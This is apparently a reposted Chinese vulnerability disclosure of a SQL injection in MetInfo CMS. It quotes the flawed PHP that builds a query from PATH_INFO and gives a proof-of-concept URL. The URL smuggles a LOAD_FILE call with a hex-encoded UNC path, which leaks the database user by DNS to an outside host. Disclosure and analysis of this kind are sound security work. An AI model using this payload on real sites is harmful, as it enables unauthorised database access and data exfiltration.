MetInfo 注入

技术 作者:HackerEye 2018-08-24 08:56:55
  1. 发布时间:2016-11-25
  2. 公开时间:N/A
  3. 漏洞类型:sql注入
  4. 危害等级:高
  5. 漏洞编号:xianzhi-2016-11-61726270
  6. 测试版本:N/A

漏洞详情

app/system/include/compatible/metv5_top.php 行27
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELFs = explode('/', $PHP_SELF);
$query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'";
$column = DB::get_one($query);
$_SERVER['PHP_SELF']跟$_SERVER['SCRIPT_NAME']不同 前者包括pathinfo 比如 /index.php/something/else $_SERVER['SCRIPT_NAME']就是index.php 而$_SERVER['PHP_SELF']是/index.php/something/else 这里explode之后进入了sql语句 造成注入 找一个包含的地方就可以了

测试方法:

由于metinfo默认没显错 这里注入点也没输出 所以用延时或者类似cloudeye.me的方法来做 需要适当编码
http://192.168.1.170/metinfo/member/login.php/x'%20and%20if((SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT%20hex(user())),0x2e6c756461732e70772f2f666f6f626172))),1,1)%23%23/a
wireshark抓个包证明下吧 0x726f6f74406c6f63616c686f7374=root@localhost
作者:索马里的乌贼 链接:https://www.jianshu.com/p/89003d2cf2be

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接